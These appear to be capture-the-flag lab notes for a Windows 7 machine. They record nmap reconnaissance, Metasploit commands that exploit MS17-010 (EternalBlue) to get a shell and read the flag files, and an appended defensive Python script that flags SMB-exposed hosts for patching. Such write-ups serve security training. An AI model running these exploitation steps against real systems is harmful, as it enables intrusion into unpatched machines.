RECON
Nmap Scan
nmap -p- -A -T4 10.10.10.40
-p- scans all ports, -A enables OS and version detection, -T4 uses the aggressive timing template
Ports 139 and 445 show SMB is running
Google-Fu
Windows 7 Professional 7601 Service Pack 1
MS17-010 EternalBlue
Metasploit Search
msfconsole
search eternal blue
Auxiliary Scan
use 3
set RHOSTS 10.10.10.40
run
Host is likely vulnerable
ENUMERATION
Eternal Blue Exploit
use 0
set RHOSTS 10.10.10.40
run
Success
PRIVILEGE ESCALATION
Directories
shell
cd C:/
cd Users
dir
User Flag
cd haris
cd Desktop
dir
type user.txt
Root Flag
cd C:/Users/Administrator
cd Desktop
dir
type root.txt
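
The recon finding above (SMB open on 139/445 plus an OS string that leads to MS17-010), turned into a patch-triage check over Nmap XML output. This is an added example, not part of the original notes; the sample XML is constructed, and the function name, the second host and the list of OS releases to prioritise are assumptions.

```python
import re
import xml.etree.ElementTree as ET

# Constructed sample in the shape of `nmap -A -oX` output (not a real capture).
SAMPLE_XML = """<nmaprun>
  <host>
    <address addr="10.10.10.40" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="139"><state state="open"/></port>
      <port protocol="tcp" portid="445"><state state="open"/></port>
    </ports>
    <hostscript>
      <script id="smb-os-discovery"
              output="&#10;  OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)"/>
    </hostscript>
  </host>
  <host>
    <address addr="192.0.2.15" addrtype="ipv4"/>
    <ports><port protocol="tcp" portid="445"><state state="filtered"/></port></ports>
  </host>
</nmaprun>"""

SMB_PORTS = {"139", "445"}
# Assumption: releases to put first in the MS17-010 patch check; adjust to your estate.
LEGACY_OS = re.compile(r"Windows (7|Vista|XP|Server 2008|Server 2003)", re.I)

def triage_smb_hosts(xml_text):
    """Return one record per host that has an SMB port open, for patch follow-up."""
    findings = []
    for host in ET.fromstring(xml_text).iter("host"):
        addr = host.find("address[@addrtype='ipv4']")
        open_smb = sorted(int(p.get("portid")) for p in host.iterfind("ports/port")
                          if p.get("portid") in SMB_PORTS
                          and p.find("state[@state='open']") is not None)
        if addr is None or not open_smb:
            continue  # filtered or closed SMB is not reachable, skip it
        script = host.find("hostscript/script[@id='smb-os-discovery']")
        match = re.search(r"OS:\s*(.+)", script.get("output", "")) if script is not None else None
        os_name = match.group(1).strip() if match else "unknown"
        findings.append({
            "host": addr.get("addr"),
            "smb_ports": open_smb,
            "os": os_name,
            "prioritise": bool(LEGACY_OS.search(os_name)),
        })
    return findings

if __name__ == "__main__":
    for finding in triage_smb_hosts(SAMPLE_XML):
        print(finding)
```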